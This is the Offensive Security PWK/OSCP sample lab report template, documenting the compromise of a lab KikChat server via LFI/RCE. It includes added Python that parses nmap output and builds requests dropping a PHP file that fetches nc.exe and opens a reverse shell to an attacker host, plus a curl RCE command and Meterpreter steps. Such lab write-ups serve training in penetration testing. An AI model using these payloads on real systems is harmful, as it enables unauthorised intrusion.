Offensive Security Penetration Test Report for Internal Lab and Exam
v.1.1
OSID: XXXXX
© All rights reserved to Offensive Security, 2016
No part of this publication, in whole or in part, may be reproduced, copied, transferred or any other right reserved to its copyright owner, including photocopying and all other copying, any transfer or transmission using any network or other means of communication, any broadcast for distant learning, in any form or by any means such as any information storage, transmission or retrieval system, without prior written permission from Offensive Security.
About this Document
Submitting your course exercises and PWK lab report along with your exam report may have its benefits. For example, up to 5 points may be earned by submitting your lab report along with your exercises. Although submitting your PWK lab report and the corresponding course exercises is completely optional, it is not difficult to see why it's highly recommended to do so.

This document is provided as an example of what is expected, at minimum, in a typical lab report that is submitted for review. You must successfully compromise no less than 10 machines in the labs and document all of your steps as illustrated in the "Offensive Security Lab and Exam Penetration Report: Section 3 - Methodologies" template. You may choose to include more than 10 machines in your report; however, this will not provide any additional points to your final exam score.

The sample report presented in this document has been adapted for the non-native English speaker. For that reason, Offensive Security has opted for a more visual (i.e., more screenshots) style of reporting. A narrative of how the machine was compromised, as well as vulnerability information, can be included in the report at your discretion. Please note that this template is only a guide; you may opt not to use it and create your own. The report, regardless of the template used, must be clear, concise, and most importantly, it must be reproducible. In other words, we must be able to compromise the machine again by simply following the report.
Table of Contents
1.0 Offensive Security Lab and Exam Penetration Test Report
  1.1 Introduction
  1.2 Objective
  1.3 Requirements
2.0 Report – High-Level Summary
  2.1 Report – Recommendations
3.0 Report – Methodologies
  3.1 Report – Information Gathering
  3.2 Report – Service Enumeration
  3.3 Report – Penetration
  3.4 Report – House Cleaning
4.0 PWK Course Exercises
1.0 Offensive Security Lab and Exam Penetration Test Report

1.1 Introduction
The Offensive Security Lab and Exam penetration test report should contain all the steps taken to successfully compromise machines both in the exam and lab environments. Accompanying data used in both environments should also be included, such as PoCs, custom exploit code, and so on. Please note that this report will be graded from a standpoint of correctness and completeness. The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge required to successfully achieve the Offensive Security Certified Professional (OSCP) certification.
1.2 Objective
The objective of this assessment is to perform an internal penetration test against the Offensive Security Lab and Exam network. The student is tasked with following a methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report. A sample page has been included in this document that should help you determine what is expected of you from a reporting standpoint. Please use the sample report as a guide to get you through the reporting requirement of the course.
1.3 Requirements
The student will be required to complete this penetration testing report in its entirety and to include the following sections:
• Overall High-Level Summary and Recommendations (Non-technical)
• Methodology walk-through and detailed outline of steps taken
• Each finding with accompanying screenshots, walk-throughs, sample code, and proof.txt file if applicable
• Any additional items as deemed necessary
2.0 Report – High-Level Summary
OS-XXXXX was tasked with performing an internal penetration test in the Offensive Security Labs and Exam network. An internal penetration test is a simulated attack against internally connected systems. The focus of this test is to perform attacks, similar to those of a malicious entity, and attempt to infiltrate Offensive Security's internal lab systems – the THINC.local domain, and the exam network. OS-XXXXX's overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.

While conducting the internal penetration test, several alarming vulnerabilities were identified within Offensive Security's network. For example, OS-XXXXX was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During testing, OS-XXXXX had administrative level access to multiple systems. All systems were successfully exploited and access granted. These systems, as well as a brief description of how access was obtained, are listed below:
• Target #1 – Obtained a low-privilege shell via the vulnerable web application called 'KikChat'. Once in, access was leveraged to escalate to NT AUTHORITY\SYSTEM using the 'getsystem' command in Meterpreter.
2.1 Report – Recommendations
OS-XXXXX recommends patching the vulnerabilities identified during the penetration test to ensure that an attacker cannot exploit these systems in the future. One thing to remember is that these systems require frequent patching and, once patched, should remain on a regular patch program in order to mitigate additional vulnerabilities that may be discovered at a later date.
3.0 Report – Methodologies
OS-XXXXX utilized a widely adopted approach to performing penetration testing that is effective in testing how well the Offensive Security Labs and Exam environments are secured. Below is a summary of how OS-XXXXX was able to identify and exploit a number of systems.
3.1 Report – Information Gathering
The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, OS-XXXXX was tasked with exploiting the lab and exam network. The specific IP addresses were:

Lab Network
192.168.31.218
3.2 Report – Service Enumeration
The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable to an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system provides an attacker with vital information before conducting the actual penetration test. In some cases, some ports may not be listed.

Server IP Address     Ports Open        Service/Banner
192.168.31.218        TCP: 80, 3389     Apache / RDP
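The table above is normally filled in by hand from nmap output. The following is an added example (not code from the OffSec sample report) that turns nmap greppable output (the -oG format) into the same three columns, keeping only open ports so that filtered and closed ports do not leak into the report. The SAMPLE_GNMAP text is constructed for this example: only the target address matches the report, and the banners are made up.

```python
"""
Added example (not code from the OffSec sample report): converts nmap
greppable output (-oG) into the rows of the Service Enumeration table,
keeping only open ports. SAMPLE_GNMAP is constructed; only the target
address matches the report, the service banners are invented.
"""
from collections import defaultdict

# Constructed sample of `nmap -sV -oG -` output (not a real scan).
SAMPLE_GNMAP = (
    "# Nmap 7.94 scan initiated as: nmap -sV -oG - 192.168.31.218\n"
    "Host: 192.168.31.218 ()\tStatus: Up\n"
    "Host: 192.168.31.218 ()\tPorts: 80/open/tcp//http//Apache httpd 2.2.21/, "
    "3389/open/tcp//ms-wbt-server//Microsoft Terminal Services/, "
    "135/filtered/tcp//msrpc///\tIgnored State: closed (997)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned\n"
)


def parse_gnmap(text):
    """Return {ip: {proto: [(port, service, version), ...]}} for open ports only."""
    hosts = defaultdict(dict)
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        # Each tab-separated field is "Key: value" (Host, Status, Ports, Ignored State).
        fields = {}
        for chunk in line.split("\t"):
            key, _, value = chunk.partition(": ")
            fields[key] = value
        ip = fields["Host"].split()[0]  # "192.168.31.218 ()" -> address only
        _ = hosts[ip]                   # register the host even if it has no Ports field
        for entry in filter(None, fields.get("Ports", "").split(", ")):
            # port/state/proto/owner/service/rpc/version/ ; the version may itself contain '/'
            port, state, proto, _owner, service, _rpc, version = entry.split("/", 6)
            if state == "open":
                hosts[ip].setdefault(proto, []).append((int(port), service, version.rstrip("/")))
    return dict(hosts)


def report_rows(hosts):
    """Flatten to the report's three columns: IP, ports open, service/banner."""
    rows = []
    for ip, protos in sorted(hosts.items()):
        ports_col, banner_col = [], []
        for proto in sorted(protos):            # "tcp" sorts before "udp"
            entries = sorted(protos[proto])     # ascending port number
            if entries:
                ports_col.append(f"{proto.upper()}: " + ",".join(str(p) for p, _, _ in entries))
                banner_col += [f"{svc} ({ver})" if ver else svc for _, svc, ver in entries]
        rows.append((ip, "; ".join(ports_col), " / ".join(banner_col)))
    return rows


if __name__ == "__main__":
    print(f"{'Server IP Address':<20}{'Ports Open':<18}Service/Banner")
    for ip, ports, banners in report_rows(parse_gnmap(SAMPLE_GNMAP)):
        print(f"{ip:<20}{ports:<18}{banners}")
```

Feed it a real scan with `nmap -sV -oG scan.gnmap <target>` and `parse_gnmap(open("scan.gnmap").read())`; the filtered port 135 in the sample is dropped on purpose, since the report column is for open ports.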
3.3 Report – Penetration
The penetration testing portion of the assessment focuses heavily on gaining access to a variety of systems. During this penetration test, OS-XXXXX was able to successfully gain access to 10 out of the 50 systems.

Vulnerability Exploited: KikChat - (LFI/RCE) Multiple Vulnerability
System Vulnerable: 192.168.31.218
Vulnerability Explanation: The KikChat web application suffers from a Local File Include (LFI), as well as a Remote Code Execution (RCE) vulnerability. A combination of these vulnerabilities was used to obtain a low privilege shell.
Privilege Escalation Vulnerability: Named Pipe Impersonation (In Memory/Admin)
Vulnerability Fix: No known patch or update for this issue.
Severity: Critical

Information Gathering:
Content of target's robots.txt (using curl):
Further enumeration of port 80 using a browser:
Searching Exploit-DB for PoC on KikChat's vulnerability:
Proof Of Concept Code: https://www.exploit-db.com/exploits/30235/

Confirming RCE: Using the PoC from Exploit-DB, additional information about the web server is gathered by creating a PHP file with 'phpinfo()' and viewing it.

Command issued from terminal:
curl -s http://192.168.31.218/8678576453/rooms/get.php\?name\=info.php\&ROOM\="<?php+phpinfo()+?>"
The backslashes stop the shell from interpreting ? (globbing) and & (backgrounding the command); the + signs are decoded to spaces on the server side, so the file that gets written contains <?php phpinfo() ?>.

Viewing custom PHP file in the browser:
Getting Low-Privilege shell:
Using the RCE vulnerability, create a PHP file called 'shell.php' that downloads 'nc.txt', saves it as a batch file, creates 'nc.exe' and connects back to the attacker:

Hosting 'nc.txt' file:
RCE command to download 'nc.txt', run 'shell.php', and connect to attacking machine:
Listener on attacking machine:
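Both the "Confirming RCE" step and the "Getting Low-Privilege shell" step reuse the same primitive: get.php writes the ROOM parameter into a file named by the name parameter. The following is an added example (not code from the sample report or from the KikChat PoC) that builds those two requests with proper URL encoding, so no shell escaping is needed and the PHP payload arrives intact, and that checks the fetched info.php for phpinfo() markers. The target address and the /8678576453/rooms/get.php path are copied from the report's curl command; the parameter semantics, the dropper body, the staging URL and the attacker host/port are assumptions for this example.

```python
"""
Added example, not code from the OffSec sample report: builds the get.php
requests for the "Confirming RCE" and "Getting Low-Privilege shell" steps.
Assumptions: get.php writes ROOM= into the file named by name= (inferred
from the report's curl command); the shell.php body, staging URL and
attacker host/port below are placeholders.
"""
import shlex
from urllib.parse import parse_qs, urlencode, urlsplit

TARGET = "http://192.168.31.218"          # from the report
GET_PHP = "/8678576453/rooms/get.php"     # path used in the report's curl command


def write_file_url(filename, content, base=TARGET):
    """Request that makes get.php write `content` into `filename` (assumed behaviour).
    urlencode() percent-encodes <, ?, (, ) and friends and turns spaces into '+',
    which PHP decodes back to spaces when populating $_GET."""
    return f"{base}{GET_PHP}?{urlencode({'name': filename, 'ROOM': content})}"


def server_side_view(url):
    """Decode the query the way $_GET will see it, to check the payload is intact."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs["name"][0], qs["ROOM"][0]


def curl_command(url):
    """Shell-safe curl invocation: quoting replaces the manual backslash escapes."""
    return f"curl -s {shlex.quote(url)}"


def phpinfo_probe_url():
    """Step 1 of the report: drop info.php containing phpinfo()."""
    return write_file_url("info.php", "<?php phpinfo() ?>")


def rce_confirmed(response_body):
    """Heuristic check on the fetched info.php: real phpinfo() output carries both markers."""
    return "PHP Version" in response_body and "phpinfo()" in response_body


def dropper_php(nc_url, attacker_host, attacker_port):
    """Assumed body of shell.php: fetch nc.txt, store it as nc.exe, connect back."""
    return (
        "<?php "
        f"file_put_contents('nc.exe', file_get_contents('{nc_url}')); "
        f"system('nc.exe {attacker_host} {attacker_port} -e cmd.exe'); "
        "?>"
    )


def shell_drop_url(nc_url, attacker_host, attacker_port):
    """Step 2 of the report: write shell.php through the same primitive."""
    return write_file_url("shell.php", dropper_php(nc_url, attacker_host, attacker_port))


if __name__ == "__main__":
    # Attacker host/port and staging URL are placeholders for this example.
    print(curl_command(phpinfo_probe_url()))
    print(curl_command(shell_drop_url("http://10.11.0.1/nc.txt", "10.11.0.1", 443)))
    print(curl_command(f"{TARGET}/8678576453/rooms/shell.php"))  # trigger the dropper
```

The printed commands are what you would paste into a terminal with a listener (nc -lvp 443) already running; server_side_view() is the offline check that the bytes PHP receives are exactly the payload you intended, which is where hand-escaped curl lines usually go wrong.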
Privilege Escalation:
Using Metasploit, a Meterpreter PHP reverse shell is created. Once created, it is uploaded to the target machine the same way as the 'nc.txt' file, and then it is executed using 'curl'.

Creating Meterpreter PHP reverse shell:
Hosting & executing malicious file:
Proof file:
3.4 Report – House Cleaning
The house-cleaning portion of the assessment ensures that remnants of the penetration test are removed. Oftentimes, fragments of tools or user accounts are left on an organization's computer, which can cause security issues down the road. Ensuring that we are meticulous and that no remnants of our penetration test are left over is of paramount importance.

After the objectives on both the lab network and exam network were successfully completed, OS-XXXXX removed all user accounts and passwords as well as the Meterpreter services installed on the system. Offensive Security should not have to remove any user accounts or services from any of the systems.
4.0 PWK Course Exercises
Course exercises are to be documented and added in this section of the report.